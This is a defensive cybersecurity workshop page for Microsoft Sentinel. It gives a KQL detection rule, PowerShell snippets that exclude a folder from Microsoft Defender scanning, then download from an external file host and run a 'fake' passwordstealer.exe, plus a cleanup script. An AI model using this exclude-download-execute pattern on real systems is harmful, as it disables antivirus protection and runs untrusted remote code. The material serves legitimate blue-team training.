Defensive Cybersecurity Workshop

Welcome to the Defensive Cybersecurity Workshop, a hands-on cybersecurity workshop where students deploy their own cloud-based security infrastructure using Microsoft Azure and Microsoft Sentinel. This immersive experience lays the foundations for real-world blue team skills in detection, investigation, and response to modern cyber threats.


Workshop Slides

View the full slide deck below or open it in a new tab to copy text and explore in detail.

Open Workshop Slides

Copy Snippets

Below are the key snippets needed for the workshop.

Detection Rule (Slide 6.5)

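// Event ID 4688 is "A new process has been created"
Event
| where EventID == 4688
// Keep only events whose data mentions the workshop's fake executable
| where EventData contains "passwordstealer.exe"
| project TimeGenerated, Computer, EventID, RenderedDescription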

Download Fake Executable (Slide 7.1)

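# Source archive and local working paths for the fake executable
$zipUrl = "https://files.catbox.moe/yjkxr7.zip"
$zipPath = "$env:TEMP\passwordstealer.zip"
$extractPath = "$env:TEMP\passwordstealer_final"
# Exclude the extraction folder from Microsoft Defender scanning (requires an elevated session)
Add-MpPreference -ExclusionPath $extractPath
# Download the archive and unpack it into the excluded folder
Invoke-WebRequest -Uri $zipUrl -OutFile $zipPath
Expand-Archive -Path $zipPath -DestinationPath $extractPath -Force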

Launch Fake Executable (Slide 7.2)

# Run in the same PowerShell session as the download snippet so $extractPath is still defined
Start-Process "$extractPath\passwordstealer.exe"
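
Cleanup after the exercise, as an added example that is not part of the original workshop material: the download snippet leaves a Microsoft Defender exclusion and the extracted files on the VM, and this removes both and checks that the exclusion is gone. It assumes the same paths as the snippets above, an elevated PowerShell session, and that the running process is named passwordstealer after its executable.

```powershell
# Added example (not from the workshop slides): undo the lab setup on the VM.
# Assumption: these paths match the ones used in the download snippet.
$zipPath     = "$env:TEMP\passwordstealer.zip"
$extractPath = "$env:TEMP\passwordstealer_final"

# Stop the fake executable if it is still running.
# Assumption: the process name is the executable name without ".exe".
Get-Process -Name "passwordstealer" -ErrorAction SilentlyContinue |
    Stop-Process -Force

# Delete the downloaded archive and the extracted folder.
Remove-Item -Path $zipPath -Force -ErrorAction SilentlyContinue
Remove-Item -Path $extractPath -Recurse -Force -ErrorAction SilentlyContinue

# Remove the Defender exclusion created by Add-MpPreference (needs elevation).
Remove-MpPreference -ExclusionPath $extractPath

# Verify: the exclusion list should no longer contain the lab folder.
$remaining = @((Get-MpPreference).ExclusionPath) |
    Where-Object { $_ -eq $extractPath }

if ($remaining) {
    Write-Warning "Defender exclusion still present: $extractPath"
} else {
    Write-Output "Defender exclusion removed and lab files deleted."
}
```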